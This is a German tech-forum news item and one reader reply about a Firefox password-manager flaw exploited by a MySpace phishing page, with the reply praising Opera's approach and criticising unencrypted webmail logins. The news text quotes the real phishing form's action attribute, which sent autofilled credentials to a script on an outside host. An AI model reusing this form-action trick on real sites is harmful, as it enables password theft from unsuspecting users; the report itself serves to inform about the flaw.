Viren, Spyware, Datenschutz 11.234 Themen, 94.586 Beiträge

News: Missbrauch von Passwörtern

Scheußliches Sicherheitsloch in Firefox

Redaktion / 14 Antworten / Flachansicht Nickles

Bei Myspace ist eine neue Phishing-Variante aufgetaucht, die Passwörter aus dem Firefox abgreift und an eine andere Site sendet! Dort werden die Passwörter dann munter für Logins benutzt! Nur durch einen kleinen Layout-Fehler auf der Phishing-Site wurde der Diebstahl bemerkt.

Der Passwort-Manager von FF ist eine schöne Sache, aber dieser Exploit ist der schlichte Horror: Robert Chapin, der den Fehler gestern bei Bugzilla als Bug 360493 gemeldet hat, beschreibt, was ihm passiert ist:

In einem Formular in einem Myspace-Profil befand sich das folgende Attribut:

action="http://membres.lycos.fr/adel88duran/plaguedoctor.php"

Sendet man das Formular ab, wird das Skript ausgeführt. Danach erscheint ein gefälschtes Myspace-Login auf dem fr-Server und schwuppsdiwupps - FF trägt dort Name und Passwort ein, obwohl man sich auf der Domain membres.lycos.fr befindet! Es erscheint keine Warnung. Das funktioniert auch mit FF 1.x-Versionen, wie dieser Proof of Concept zeigt.

Einen Bugfix gibt es noch nicht.

Quelle: Bugzilla

bei Antwort benachrichtigen
i.mer Redaktion „Scheußliches Sicherheitsloch in Firefox“
Optionen

Also, cih finde die Methode von Opera viel besser. Dort werden "gespeicherte" Felder lediglich farblich hervorgehoben. Klickt man dann auf OK/Submit, so kann nichts passieren. Das einloggen Erfolgt mit dem Button "Log in" oder Shift+X, bei entsprechender Einstellung auch beim weiterblättern mit Space, falls man das Seitenende erreicht hat. Aber die Aoutomatik-JS-Submit-Funktion ist erstmal aus dem Spiel, da der Browser nichts selbstständig einträgt.

Zudem lassen sich die Passwörter gezielt für einzelne seiten speichern.

Damit sind auch mehrere gespeicherte Accounts pro Seite oder Domain möglich, für die ein Auswahlmenü erscheint.

Ich ebenfalls möchte nie wieder auf diese Funktion verzichten.
Wenn ich ständig die Daten beim Mailer, Ebay und Nickles eintippen müssten, dann kann ich gleich zum Steinhammer greifen. So viel Komfort will ich einfach haben.

Das minimiert auch die Gefaht, sich ständig mit dem gleichen Passwort anmelden zu wollen (aber mal ehrlich, wer hat denn bei zwei-drei Dutzend Forummitgliedschaften je ein Passwort für jede???).

Tabu sind nach wie vor "teure" Sachen, wie Onlinebanking und Trading, da wird nichts gespeichert.

BTW: wollte von Web.de weg und schaute mir alle gängige Mailer an. Wahnsinn, fast überall ist das Einloggen über HTTPS erst durch einen optionalen Link angeboten.
Standard bei Yahoo, Arcor, Lycos und Co. immer unverschlüsselt. Bei GMX habe ich gar keine HRRPS-Option gefunden.

Bei Web.de ist es andersrum. Dafür mein Lob.

bei Antwort benachrichtigen